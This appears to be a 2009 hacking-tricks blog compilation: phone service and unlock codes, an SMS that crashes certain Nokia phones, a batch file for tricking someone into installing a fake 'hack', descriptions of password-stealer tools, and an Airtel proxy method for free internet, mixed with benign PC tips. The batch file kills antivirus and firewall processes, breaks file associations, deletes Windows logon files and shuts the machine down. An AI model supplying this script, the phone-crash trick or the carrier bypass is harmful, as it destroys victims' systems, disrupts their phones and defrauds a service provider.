Developer Team names: *#9908#
L1 Debug on/off (NetMonitor): *#9911#
Forbidden List: *#9912#
bDAC: *#9913#
Service Active: *#9916#
Lock Status: *#9917#
Names Maxxon , Audioloop , GCS .. : *#9919..9922#
Forced Location Update: *#9924#
Backlight off when charging: *#9931#
Discharging battery: *#9937#
Watch stop: *#9958#
Watch start: *#9959#
Contrast set: *#9960#
Menu, reset (without SIM): *#9922#
Software Version: *#9900#
Software Version (PBatch): *#9901# ">
S60 Siries (SX1, 6600, N-Gage..) ">
Factory default: *#7780#
Full factory defaults (all user data reset): *#7370#
SX1 formating: * + # + power on
6600 formating: 3 + * + send + power on
Sendo X1 formating: 5 + power on

MITSUBISHI
Format FFS (Eclipse): *65512890 (*-hold)
Test mode: * 3926 - (*-hold)
SW version: * 5806 - (*-hold)
Trium 320 unlock menu: *(hold) 787090

MOTOROLA
Master code (T190, T191, T205): 19980722, 20010903
P2K test menu: *#06#, menu, menu, 048263*
Test comands:
Read phone code: 32*116*1*0*0
Read security code: 32*118*1*0*0
Factory reset, phone code off: 18*0
Master reset: 18*1
Full phone reset: 54*18*1
Select 900/1800: 10*0*6
Model: 32*279*1*0*8
Flex version: 32*383*1*0*0
Hard reset MPx200 - blue button + power on

NOKIA
Code reset (6230): *#7370925538#
Sim clock: *#746025625# [*#sim0clock#]
Waranty: *#92702689# [*#war0anty#]

NOKIA 5110/5120/5130/5190
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 # ">
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 # ">
Provider lock status: #pw+1234567890+1
Network lock status #pw+1234567890+2
Provider lock status: #pw+1234567890+3
SimCard lock status: #pw+1234567890+4

NOKIA 6110/6120/6130/6150/6190
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 # ">
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #

NOKIA 3110
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #

PANASONIC
Master reset (user data, user code) A100, A101, A102, G50, G51, G70, GD55, ...: *01763*737381#
Menu: *369#(*)
Lock menu: 746 menu, menu
5 sec after power on - SW version (GD75, GD67, GD87..): *#9999#

PHILIPS
IMEI number: * # 0 6 #
Simlock info: * # 8 3 7 7 #
Security code: * # 1 2 3 4 # (Fizz) or * # 7 4 8 9 #
630 without SIM (erase flash): #20021208#
RSAV DONE: *#7728*#
Reboot: *#3849*#
Reboot: *#3851*#
Philips 568 reset: *01763*737381#

PANTECH
Master reset (user data, user code) without SIM: *01763*737381#
SW version: *01763*8371#
Unlock: *01763*6371#
Menu: *01763*3641#
PANTECH HX-550C
Full reset (phone code reset): ##03*934#9367*192#397#7412569746 PWR,
After reset: ##27732726 PWR and select "with sim"

SAMSUNG
Full E2P reset: *2767*3855#
Custom E2P reset: *2767*2878#
Unlock: #*7337#
Unlock: *2767*688#
Contrast: *#0523#
Service Menu (X100): *#8999*8378#
SAMSUNG SGH600/2100DB
IMEI number: * # 0 6 #
Software version: * # 9 9 9 9 # albo * # 0 8 3 7 #
Net Monitor: * # 0 3 2 4 #
Chaning LCD contrast: * # 0 5 2 3 # ">
Memory info: * # 0 3 7 7 # albo * # 0 2 4 6 # : none">
Reset pamieci (SIMLOCK`a removing!!!): *2767*3855#
Reset pamieci CUSTOM: *2767*2878#
Battery state: * # 9 9 9 8 * 2 2 8 #
Alarm beeper: *#9998*289#
Vibra test: *#9998*842#

SIEMENS C25
IMEI number: * # 0 6 #
Software version: put off sim card and enter: * # 0 6 # and press LONG KEY
Bunus screen: in phone booke: + 1 2 0 2 2 2 4 3 1 2 1
Net Monitor (S4 Power): Menu 9 8, left SoftKey, 7 6 8 4 6 6 6, Red phone, Menu 5 6

SONY ERICSSON
Service menu: > * < < * < *
Lock menu: < * * <
VK MOBILE
SW version: *#79#
Hold menu: *#85*364# (*)
Without SIM (VG107): 855855#
Hold: 85558555#(*)
Hold (VG207): 4268#(*)

VOXTEL
Master code: 0124
Hold menu: (ST11, SC10, V100 without SIM)0718#(*)
Hold show code (ST11, SC10 without SIM): 4268#(*)
Hold menu (V50, RX100 without SIM): *789(#)

/* Chinese handset Service codes !! */


Service codes Samsung:

E900 software version: *#5002*8376263#
E900 full reset: *2767*3855#


Service codes Spice:

S404 enable COM port: *#42253646633# -> Device -> Set UART -> PS -> UART1/115200
S410 engineer mode: *#3646633#
S900 software version: *#8375#
S900 serial no: *#33778#


Service codes Philips:

S200 enable COM port: *#3338913# -> Device -> Set UART -> PS -> UART1/115200


Service codes "Chinese" models:
default user code: 1122, 3344, 1234, 5678
Engineer mode: *#110*01#
Factory mode: *#987#
Enable COM port: *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
Restore factory settings: *#987*99#
LCD contrast: *#369#
software version: *#800#
software version: *#900#

/* Restart Your Friends Phone Using Sms !! */


A lil old Trick ..

Restart your friends phone using Sms here is a trick to restart ur friends mobile via sms with this trick only 1110,1110i,1112,1100,2100 can be restarted. just type ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,, or 79 inverted commas in text msg and send it to ur friend having cells mention above and see what happens.

/* Fool Someone Into Thinking That He Is Installing a Hack */

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!

This Hack will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens


Code is

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown


WARNING

Please Do NOT Try This Yourself!

I will NOT Be Held Responsible for this!

May 15, 2009

/* Magis ISO - to extract files from CD or DVD image(.nrg file) */

To extract contents from a CD or DVD image file, simply download

the software called MagicISO from

http://www.magiciso.com/download.htm

try... its working....

/* Hide ur folders */

Hide ur folders.. never known trick !!!!!!!!!! Disguise them to Recycle Bin


Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u've a folder games
press F2,
then type, games.{645FF040-5081-101B-9F08-00AA002F954E}
c the magic....
then 2 get to original form,
remove the extension using
ren games.{645FF040-5081-101B-9F08-00AA002F954E} games in dos or as a bat file


n u are done..

/* Speed Up Ur Shut down */

Speed Up Ur Shut down !!


Start Regedit.
Navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl.
Click on the Control Folder.
Select WaitToKillServiceTimeout
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).

/* Some tool names */

Some tool names
Hackers tools a reference ! BEWARE !!

AAh!!

The following tools m gonna list now are some of the dangerous tools available on www, which may be used on u by an unethical hacker. I want you to be well aware of all the possibilities.

They are Free to download and it takes seconds to crush up personal computer if wired online, m not disclosing the links to these tools .

Lord PS
Lord PS is an editor that will create a password stealervirus that emails you the passwords with tons of options, options may include taking over ur entire pc and disallowing u to access any of the files

Hosein PS v1.6
Does the same job with above with less optionsfeatures, another yahoo pass stealer

Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programsservices, msn, yahoo etc

JPS v1.8
Another password grabberstealer - e mailer that is more focuced on Yahoo messenger

Demon PS v2.3
Yahoo messenger password stealermailer with anti virus kill options
and other system features

Tro messenger

The big Boss , used with Yahoo messenger lets u take over victims Pc


Many more exists,will be disclosing all of them
Even u can contribute

/* Shutdown your PC with an SMS */

just watch video...........!


http://www.youtube.com/watch?v=KUw_9qbNj_E&eurl=http%3A%2F%2Fwww.insecure.in%2Fremote_pc_shutdown.asp&feature=player_embedded

hw's it...........!

May 9, 2009

/* Protect your password in cyber cafe and on public computers */

Some time or the other, you must have used cyber dafe or public computers to access internet or mail.
Public computers are most prone to password hacking. Anyone can simply install a keylogger software to hack your password.
Keylogging is one of the most insidious threats to a user’s personal information. Passwords, credit card numbers etc.
It is now very easy for the keylogger to harvest passwords. Each and every keystroke (whatever you type on the keyboard) gets recorded in the keylogger software and the person installing it can easily view what you have typd in.
For example, if you go to hotmail.com and check your mails. Say your ID is sarahj7@hotmail.com and password is snoopy2. the keylogger software records your usename and password in its log file as
Microsoft Internet Explorer :
www.hotmail.comsarahj7@hotmail.comsnoopy2
Or
Firefox:
www.hotmail.comsarahj7@hotmail.comsnoopy2

Risky isnt it???!!!
There’s solution to this problem and you can easily fool the hacker.
The keylogger software sees and records everything,but it doesn’t understand what it sees. I
t does not know what to do with keys that are typed anywhere other than the password or user name fields.
So,between successive keys of the password if you enter random keys, the keylogger software wont ever come to konw where you typed in what..
In the process of recording the keys, the string that the keylogger receives will contain the password, but embedded in so much random junk that discovering it is infeasible.
So…
1.Go to hotmail.com or yahoo.com or any of the site where you need to insert a password or PIN.
2.Type in your user ID.
3. Type in the first characterof the password.
4. Click on the address bar in the internet explorer or Firefox. Type in some 3/4 random charachters.
5. Again go to password field and type in the second character of the password.And probably third too.
6. Again go to the addressbar and type in a few mroe random character.
7. Back to the password field and the next characters of the password.
Keep on repeatin the process till you type in the full password in the password field.

Instead of the password
snoopy2 the keylogger now gets:
hotmail.comspqmlainsdgsosdgfsodgfdpuouuyhdg2
Here a total of 26 random characters have been inserted among the 7 characters of the actual password!!!


No doubt it takes a little bit of more time than the usual process, but you’re safe and secure that way!!!

I’d appreciate your comments/feedback!

/* Multiple Home Tabs in Mozilla Firefox */

Anyone who’s used Internet Explorer 7 may enjoy the feature of being able to have multiple home pages open in tabs. Well, you can do this in Firefox too. Go to Tools | Options. In the Main Tab, you should see the box where you type your home page. Simply write each URL you want to open in a tab and separate each with a |

For instance, if you wanted your home tabs to be TheOneGreatX.com, Digg, and Google (very fine choices, I must say) your Home Page Box would read:

http://www.blog.neo999.com|http://www.digg.com|http://www.google.com

So there you have it, one fewer reason not to use IE7.

/* Airtel Hack for free internet */

These are all the tricks i know so far

You need a PC or a Laptop and the required connectivity tools ,ie.,

Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( It’s FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the

FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for

your mobile’s modem.

4) Create a new dial-up connection using the NEW CONNECTION

WIZARD as follows

Connecting Device : Your mobile’s modem

ISP Name : Airtel (or anything you like)

Phone Number : *99***2# / Try 99***1

Username and Password : blank

5) Configure your browser and download manager to use the proxy

100.1.200.99 and port 8080.( My advice is to use Opera since you

can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2

kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get “Access

Denied…”(except for Airtel Live!). IT DOES NOT MATTER.

Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,

press ENTER and…….WAIT

9) After a few seconds the page will start to load and you have the

WHOLE internet at your disposal.

TWO

Under DATA COMM

~~~~~~~~~~~~

APN : airtelfun.com

USERNAME : blank

PASSWORD : blank

PASS REQ : OFF

ALLOW CALLS : AUTOMATIC

IPADDRESS :

DNSADDRESS :

DATA COMP : OFF

HEADER COMP : OFF

Under INTERNET PROFILES

~~~~~~~~~~~~~~~~

INTERNET MODE : HTTP or WAP (both worked for me)

USE PROXY : YES

IP ADDRESS : 100.1.200.99

PORT : 8080

USERNAME :

PASSWORD :

No Risk Here, Try it and Enjoy

Three

1st go to settings menu then to connectivity tab now choose the option Data comm. then “DATA ACCOUNTS” go to new account now the settings r as follows

ACCOUNT TYPE:GPRS

NEW ACCOUNT NAME:A1

APN:airtelfun.com

usr name: (blank)

password: (blank)

now save it

NOW!

go to Internet Setting in connectivity here choose intrnet profile–go to new profile setting are as below

NAME:A1

CONNECT USING:A1(which was created in data comm.)

save it

now u would be able to see it now selest it and take “more” option then select setting here in use proxy option it will be selected no if it is no then change it into yes

now go to proxy adress and give the adress as

100.1.200.99 and then the port number as 8080

Usr name:

password:

now save all the settings u made . come back 2 connectivity

choose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itself

THESE R THE SETTINGS

now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .GOOD LUCK AIRTEL USERS

PS : It is confirmed that this hack no longer works in certain circles. You can access the net , but Airtel will charge you.